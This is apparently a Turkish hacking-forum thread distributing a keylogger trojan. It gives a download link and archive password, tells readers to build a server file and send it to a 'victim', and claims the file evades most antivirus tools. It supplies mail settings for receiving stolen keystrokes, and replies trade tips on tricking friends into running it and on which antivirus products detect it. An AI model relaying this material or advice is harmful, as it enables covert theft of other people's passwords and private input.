Nesse Keylogger v1.2

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Hell

Başarıda bir sanattır.
Reaction score
0
Programı açıp gerekli yerleri doldurduktan sonra "Server Oluştur"a basın ve oluşturduğunuz server.exe yi kurbana yollayın. Kurban açtığı andan itibaren belirlediğiniz aralıklarla kurbanın klavyeden bastığı tuşların logları(kayıtları) gelecektir.

Program DOWNLOAD
http://www.speedyshare.com/667998349.html
Rar şifresi: nesse
Dosya boyutu: 1,79 MB
Coder: Nesse

+ Türkçe karakter desteği vardır.
+ Çoğu antivirüs tarafından tanınmaz.
+ Tüm pencerelerin loglarını alabilme özelliğine sahiptir.(Korumalı pencerelerde dahil)
+ Mouse tıklarını gösterir. Sağ tuşa veya sol tuşa tıklanıldığını belirtir.
+ Ayarlar doğru yapıldığı takdirde mailler hiç aksamadan ve dakikası dakikasına gelir.(ayarlar için bknz. Beni oku.txt)

Programın sorunsuz çalışması için;
Smtp adresi olarak gsmtp185-2.google.com seçiniz ve mail adresinizi gmail adresi giriniz. Kayıtlar mailinize sorunsuz ulaşır.

Kendı serverımla hacklediğim kurbandan gelen mail

Bu resim otomatikmen boyutlandırılmıştır. Buraya tıklayarak tam ekran yapabilirsiniz. Orijinal boyutu 1024x768 çözünürlüktedir.
nesse1.jpg

Buda kısaca kullanımı

Bu resim otomatikmen boyutlandırılmıştır. Buraya tıklayarak tam ekran yapabilirsiniz. Orijinal boyutu 1024x768 çözünürlüktedir.
nesse2.jpg

COMDLG32.OCX Hatası alanlar indirsinler.
http://www.ascentive.com/support/new/images/lib/COMDLG32.OCX

Eline sağlık, yalnız bir dosya ile birleştirme yok mu bunda? yoksa yutturması çok zor oluyor..

Ya ben kendimde denedim çalıştı, ama yolladığım arkadaş açamamış, kaspersky kullanıyomuş..
Adını şaka yaptım ve mizahi bi hata mesajı yazdım :)

Bunu kendi bilgisayarımızda acarsak nasıl temizliycez?

kulalı45' Alıntı:
Eline sağlık, yalnız bir dosya ile birleştirme yok mu bunda? yoksa yutturması çok zor oluyor..
kraql2' Alıntı:
Ben AVAST kullanıyorum ve gerçekten trojan ı tanımıyor,dosya birleştirme sanırım yok

Maalesef dosya ile birleştirme henüz entegre edilmemiş.

kulalı45' Alıntı:
Ya ben kendimde denedim çalıştı, ama yolladığım arkadaş açamamış, kaspersky kullanıyomuş..
Adını şaka yaptım ve mizahi bi hata mesajı yazdım :)
Olabilir bazı antivirüslere yakalanmıyor. Kaspersky bu yakalar ;)

Kupame' Alıntı:
Bunu kendi bilgisayarımızda acarsak nasıl temizliycez?
remove toolsunu bulara

kaliteli bir antivirüs programı kullanabilirsiniz. programda server temizleme özelliği yoksa googleden romove toolsunu arayın..

meil adresi yazıyorum test mail geliyor ama server oluşturmuyor >LÜTFEN GEÇERLİ BİR MAİL ADRESİ GİRİN< diyor ayrdımınızı bekliyorum

ya bende server oluştur derken mesaj aralığı seç diyor mesaj aralığını ne yapacam?

server nerde olusuo bende aynı dizinde olusmuyo

somakkaan' Alıntı:
ya bende server oluştur derken mesaj aralığı seç diyor mesaj aralığını ne yapacam?
mail adresinize gönderilecek bilgilerin gönderme aralığı olabilirmi?

spy_hacker' Alıntı:
meil adresi yazıyorum test mail geliyor ama server oluşturmuyor >LÜTFEN GEÇERLİ BİR MAİL ADRESİ GİRİN< diyor ayrdımınızı bekliyorum

lütfen geçerli bir mail adresi girin diyor ise test maili göndermezsiniz. eğer gönderebilyseniz zaten geçerli bir adres girmişsiniz demektir. @gmail - @yahoo adreslerini deneyin.

loumraps' Alıntı:
server nerde olusuo bende aynı dizinde olusmuyo
Gizli dosyaları açın. daha sonra dizine tekrar bakın

ya hocam gmail hesabı yazdım test maili geldi...ama server oluştur dedigimde lütfen geçerli bir mail adresi girin diyor...ama hotmail ile server oluşuyor tabi bu sefer test maili gelmiyor....bunu nasıl çözeces

hocam eline sağlık...yalnız nod32 geçit vermedi.paylaşım için teşekkürler

Arkadaşım pc her açıldığında aynı hata mesajı geliyo, program çok güzel çalışıyo ama serverin bir kere çalışması yeterli değil mi?

ben avast pro kullanıyorum hemen tanıdıı ınanın

hellboy726 bir sorum olacaktı..
hem kendi makinemde hem de serveri yolladığım makinemde güzel çalışıyor, mailleri alıyorum ama makinede sürekli bir hata mesajı çıkıyor..
bunu önlemenin bir yolu yok mu acaba..

kulalı45' Alıntı:
hem kendi makinemde hem de serveri yolladığım makinemde güzel çalışıyor, mailleri alıyorum ama makinede sürekli bir hata mesajı çıkıyor..

hellboy726 sevgili adminim, ne özel mesaj gönderebiliyorum ne de mail, ne kadar ulaşılmazsın paşam yaa.. şu soruma bi cevap versen, 2 gündür bunun cevabını bekliyorum.. teşekkürler..

kulalı45' Alıntı:

hellboy726 sevgili adminim, ne özel mesaj gönderebiliyorum ne de mail, ne kadar ulaşılmazsın paşam yaa.. şu soruma bi cevap versen, 2 gündür bunun cevabını bekliyorum.. teşekkürler..

öncelikle bu trojanı tasvip etmiyorum. Konunun 1. Mesajındaki kırmızı ile yazdığım yazıyı okuyunuz. Program size gelen mailleri aynı zamanda başkasınada gönderiyor.

Serveri gönderdiğiniz makinada alınan hata nedir ? ne tür bir hata veriyor.

COMDLG32.OCX böyle bişey iniyor pc me nasıl ayarlıyabilirim resimli olarak anlatabilirmisiniz bu işlerde cahil imdirde biraz :S

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri